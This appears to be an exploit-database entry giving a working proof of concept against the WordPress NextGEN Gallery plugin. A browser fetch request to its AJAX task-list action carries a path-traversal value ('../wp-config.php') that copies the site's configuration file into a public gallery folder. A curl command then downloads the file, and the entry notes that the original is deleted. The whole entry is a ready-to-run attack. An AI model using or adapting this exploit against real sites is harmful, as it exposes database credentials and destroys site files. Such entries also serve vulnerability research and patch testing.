Share
## https://sploitus.com/exploit?id=WPEX-ID:5C8473F4-4B52-430B-9140-B81B0A0901DA
1. Create a Gallery called "My Gallery" and note its ID.
2. Run the following code in your browser, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.

await (await fetch("/index.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"name":"x","type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"name":"x","image_list":[{"path":"../wp-config.php","filename":"xxxxxxx.jpg"}]}}]&extra_data={}',
    "method": "POST",
    "mode": "cors"
})).text();


3. Download the file contents with the following `curl` command:

curl http://SITE_URL/wp-content/gallery/my-gallery/xxxxxxx.jpg


4. Note that the `wp-config.php` file has been deleted.